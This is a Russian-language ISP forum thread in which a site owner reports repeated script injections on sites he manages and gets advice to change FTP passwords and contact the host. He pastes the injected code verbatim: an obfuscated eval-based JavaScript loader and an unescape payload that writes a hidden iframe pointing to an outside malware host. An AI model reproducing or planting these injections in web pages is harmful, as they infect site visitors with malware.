CenterTelecom Voronezh ISP

[Rizoner]

у меня на хостинге ВСИ 2 сайта там постяонно пасутся какието хакеры и делают разные вставки я их удаляю а они придумывают всё новые какието, наверное думают что я лох и их не замечу
типа:
<script language=JavaScript> function nbbnb25(z) {var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,36,25,10,56,1,59,30,37,2,0,0,0,0,0,0,21,49,31,32,11,38,15,50,27,43,53,51,6,45,13,61,4,28,16,55,40,9,24,39,7,8,62,0,0,0,0,26,0,14,18,52,0,33,41,22,42,48,35,60,44,47,34,23,54,3,19,20,57,58,46,29,5,17,12);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(150^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}nbbnb25('e0FZGWB44gv4SDZ48m_lbWFZKXHIGWBOjm0k4DaverZ0nFmmAhu0irZO6FmM4B0ZKmhISD0IJBhM8r7OIbI0nDvtlEHvmgvtKFmk4ZFZiWBvnWHhAp6pSDv04b7ZjjmkZvOOn6Fv1BFZGW0ZZZDmCg_T1ZHmAuuOG0_OWLHmAbIMe0mkn60hW_hIpu0k0Xm0nmuTm_Htn0vZKm3MG0BtEI0OmK3Ztj0kcnhhtZFk1B0ZKj_l09')</script><!-- 80.82.32.11 -->

подскажите как можно изловить азарника? слишком уж мало у меня контроля над хостингом ваще незя ничего видеть кто заходит и когда и как

[Rizoner]

извеняюсь поправка не у меня 2 сайта, а контролирую я 2 сайта ) и на все 2 сайта лазают (пароли доступа FTP менять не пробывал) но меня интерескует вопрос не как закрыть хостинг от хакеров а как поймать тех кто туда лазает ))

[Rizoner]

если кому интересно немного расшифровал то что делает этот код код : тут зашифрован код HTML

<iframe src="http://9speed.info.......... дальше расшифровывать не стал

[Oleg]

Rizoner, пароль на FTP-доступ к сайтам вам пора менять. Насчет подробностей свяжитесь с администратором хостинга, написав письмо на webadm@vsi.ru.

[Rizoner]

понятно спасиб!

[Rizoner]

еще накопал про это дело - если зайти на сайт с такой вставкой - то после этого брраузер начинает глюкавить - то не может прочитать оболасть памяти то еще чтото - вобщем вылетает - вощем лавить их надо и мачить - я пароль пока еще не менял - но лазают на сайты практически каждый день )) пипец - ваще страх потеряли

[cardinal]

Rizoner Ты чё, прикалываешься чтоли???
Туда не надо заходить, там стоит загрузчик какого то вируса, собственно для этого тот код тебе на странички и пихается - через тебя распространяют этот вирус!
К тому же, по моему по правилам хостинга тебя же за это могут и попытатся оставить крайним, скажут дескать твой вирус и предъявят распространение.

[Rizoner]

ага зашибись прикольчики - типа ребята не заходите на мой сайт там стаит втсавка типа

<script language="javascript"> document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
тут вирус

Да я смело могу заявить не заходитте на мой сайт там вирус - бл но я не могу иго искаренить (это уже за пределами хостинга VSI и не только у меня) я свои сайты чищу 2 раза в сутки но что толку просыпаюсь утром а там снова вставки

а насчет боятся мне что меня обвинят - так пусть сначало правоохранителльные органы разберутся кто лазает и кто что делает

Caldinal согласн твоему заявлению насчет обвинения в распространениии ловить надо всех у кого на сайте вставка подобного рода ))) - мож всетаки наоборот я не распростроанияю а показываю как вирус распрстраняется

ЭТ пусть хакер боится - делото дествительно подсудное

[Rizoner]

ой извените забыл добавить смена пароля помогает лиш на некотрое на время неделю -две мож тоян сидит - но брандмауер вроде показывает что утечек трафика налево нету хз ((((

[Vadim]

Думаю на этом обсуждение нужно закрыть, иначе волей топикстартера мы до вселенского заговора дойдем.
Просто поответственней нужно относиться к защите своей информации, а не фантазиями заниматься.